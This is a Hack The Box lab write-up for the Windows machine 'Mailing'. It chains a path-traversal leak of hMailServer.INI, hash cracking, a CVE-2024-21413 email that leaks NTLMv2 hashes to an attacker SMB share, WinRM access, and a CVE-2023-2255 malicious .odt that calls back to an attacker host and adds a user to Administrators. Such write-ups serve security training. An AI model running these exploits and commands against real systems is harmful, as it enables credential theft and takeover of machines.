k
Mailing — Hack The Box
| Info | Value |
|---|---|
| OS | Windows |
| Difficulty | Easy |
| IP | 10.129.232.39 |
| Hostname | mailing.htb |
| Services | SMTP/hMailServer (25,465,587), HTTP/IIS (80), POP3 (110), IMAP (143,993), SMB (445), WinRM (5985) |
Enumeration
Nmap
nmap -sC -sV -p- -vvv -oA scan/nmap.scan mailing.htbPORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4rev1 IDLE NAMESPACE SORT QUOTA ACL CHILDREN
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
993/tcp open ssl/imap hMailServer imapd
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)Info from SSL certificate
The certificate on port 465/587/993 reveals:
- CN: mailing.htb
- Email:
ruy@mailing.htb— first user found- Org: Mailing Ltd, Madrid, Spain
SMB signing not required:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredDirectory Bruteforce
feroxbuster -u http://mailing.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js,html,php,txt,json,docx -o scan/root.dirRelevant results:
| Status | Path |
|---|---|
| 200 | /download.php |
| 200 | /index.php |
| 301 | /assets/ |
| 301 | /instructions/ |
Web Application — instructions.pdf
The /instructions/ directory contains a PDF: instructions.pdf — guide to configure mail clients (Windows Mail, Thunderbird) to connect to mailing.htb.
Info from PDF
- Confirms users:
maya@mailing.htb(recipient in demos),ruy@mailing.htb(from SSL certificate)- Clients on the machine use Windows Mail and/or Thunderbird (with Outlook as viewer — relevant for CVE)
- Mail server: IMAP4 on
mailing.htb, SMTP onmailing.htb
Foothold
LFI on download.php — Leak hMailServer.INI
See also: 7 — File Inclusion & Path Traversal and MailServer
The file parameter in download.php is vulnerable to path traversal with backslash (Windows):
curl --path-as-is -i -s -k -X 'GET' \
'http://mailing.htb/download.php?file=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Program%20Files%20(x86)%2fhMailServer%2fBin%2fhMailServer%2eINI'HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Disposition: attachment; filename="hMailServer.INI"[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1Credentials found
- AdministratorPassword:
841bb5acfa6779ae432fd7a4e6600ba7(MD5)- Database Password:
0a9f8ad8bf896b501dde74f08efd7e4c
The MD5 hash of the admin is easily cracked:
hashcat -m 0 841bb5acfa6779ae432fd7a4e6600ba7 /usr/share/wordlists/rockyou.txt| Hash | Password |
|---|---|
841bb5acfa6779ae432fd7a4e6600ba7 | homenetworkingadministrator |
SMTP Credentials: administrator@mailing.htb : homenetworkingadministrator
CVE-2024-21413 — MonikerLink (Outlook NTLM Leak)
Vulnerability
CVE-2024-21413 — Microsoft Outlook Remote Code Execution via MonikerLink. Allows sending an email containing a link to an SMB share (
\\attacker\share) that forces the Outlook client to authenticate via NTLM without user interaction (zero-click). The NTLMv2 hash is captured by the attacker.Ref: https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Step 1 — Start Responder
sudo responder -I tun0 -wvStep 2 — Send the malicious email
python3 CVE-2024-21413.py \
--server mailing.htb \
--port 587 \
--username 'administrator@mailing.htb' \
--password 'homenetworkingadministrator' \
--sender 'administrator@mailing.htb' \
--recipient 'maya@mailing.htb' \
--url '\\<ATTACKER_IP>\tmp\test.txt' \
--subject TestThe email is sent via port 587 (SMTP Submission with auth). Maya opens the email in Outlook → the client attempts to access the SMB share → Responder captures the NTLMv2 hash.
Step 3 — Capture NTLMv2
[SMB] NTLMv2-SSP Client : 10.129.232.39
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:85267b37d940ab5a:67A589D74C2805844383A831FE65117B:0101000000000000801A628F37A4DC01...User
Cracking NTLMv2
hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 5600MAYA::MAILING:...:m4y4ngs4ri
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Time.Started.....: Sun Feb 22 20:13:39 2026 (0 secs)
Speed.#*.........: 32681.3 kH/s| Username | Password | Domain |
|---|---|---|
maya | m4y4ngs4ri | MAILING |
WinRM — Shell as maya
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'*Evil-WinRM* PS C:\Users\maya\Documents> ls
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 3/22/2025 4:25 PM 2257 mail.pyUser flag in C:\Users\maya\Desktop\user.txt.
Privilege Escalation
See also: PrivilegeEscalationWindows
CVE-2023-2255 — LibreOffice RCE via .odt
Vulnerability
CVE-2023-2255 — LibreOffice < 24.2.4 allows arbitrary command execution via a malicious
.odtfile exploiting Floating Frames. A specially crafted.odtfile executes commands when opened.
The machine has LibreOffice 7.4 installed, vulnerable to the CVE.
Note
You also need to download the
samples/folder from the exploit repository to generate the.odtfile.
Step 1 — Test RCE with callback
Generate a test .odt to verify execution:
python3 CVE-2023-2255.py --cmd 'curl http://<ATTACKER_IP>:80/mario' --output 'exploit.odt'Upload to the target machine in the directory C:\Important Documents\ (monitored by a task that automatically opens documents):
*Evil-WinRM* PS C:\Important Documents> upload exploit.odtAfter a few seconds, you receive the HTTP callback → RCE confirmed.
Step 2 — Add maya to the Administrators group
Spanish locale
The machine is in Spanish — the Administrators group is named
Administradores.
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'*Evil-WinRM* PS C:\Important Documents> upload exploit.odtStep 3 — Access as admin
After logout and new login with evil-winrm, maya is in the Administradores group and can access other users’ directories:
*Evil-WinRM* PS C:\Users\localadmin> ls
Directory: C:\Users\localadmin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/13/2024 4:49 PM 3D Objects
d-r--- 3/13/2024 4:49 PM Contacts
d-r--- 4/4/2024 2:06 PM Desktop
d-r--- 3/13/2024 4:49 PM Documents
d-r--- 3/13/2024 4:49 PM Downloads
d-r--- 3/13/2024 4:49 PM Favorites
d-r--- 3/13/2024 4:49 PM Links
d-r--- 3/13/2024 4:49 PM Music
d-r--- 3/13/2024 4:49 PM Pictures
d-r--- 3/13/2024 4:49 PM Saved Games
d-r--- 3/13/2024 4:49 PM Searches
d-r--- 3/13/2024 4:49 PM VideosRoot flag in C:\Users\localadmin\Desktop\root.txt.
Attack Chain Summary
Web enum → /instructions/instructions.pdf → users: maya, ruy
│
↓
LFI (download.php?file=..\..\..) → hMailServer.INI
│ AdministratorPassword MD5 → homenetworkingadministrator
↓
CVE-2024-21413 (MonikerLink) → mail to maya with SMB link
│ Responder captures NTLMv2 hash of maya
↓
hashcat -m 5600 → m4y4ngs4ri
│
↓
evil-winrm maya@mailing.htb → user flag
│
↓
CVE-2023-2255 (LibreOffice .odt) → RCE
│ net localgroup Administradores maya /add
↓
maya admin → C:\Users\localadmin\Desktop\root.txt